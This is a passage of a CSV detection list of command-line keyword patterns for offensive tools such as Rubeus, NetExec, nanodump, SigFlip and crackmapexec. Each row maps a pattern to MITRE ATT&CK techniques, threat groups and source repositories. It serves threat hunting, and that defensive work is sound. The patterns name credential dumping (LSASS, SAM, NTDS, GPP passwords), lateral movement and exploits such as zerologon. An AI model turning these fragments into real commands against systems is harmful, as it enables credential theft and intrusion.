authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.PE*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigLoader *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* --sign-domain *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --sign-steal *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* Sigwhatever*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"* --silent -obf NixImports -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* --silent-process-exit *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* silenttrinity.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"* silver * /domain*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /passlastset *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --single shadow.hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sip-call-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sip-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sip-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* sip-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* -SiteListFilePath * -B64Pass *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --skip-crawl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*- --skippasswordcheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --skipregistryloggedon*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* sliver sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* smb * --dpapi *password*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --gen-relay-list *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --lsa --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M lsassy*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M masky -o CA=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M msol *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M ntlmv1 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M rdp -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M runasppl*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M zerologon*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * --ntds --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --sam --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -u * -p * * -M dfscoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --rid-brute*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --shares --filter-shares *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_av*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_dns*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M gpp_password*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M met_inject *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb client * shares *use c$*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* smb -M mimikatz --options*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb shareenum *smb2+ntlm-password*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* smb* -u '' -p ''*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 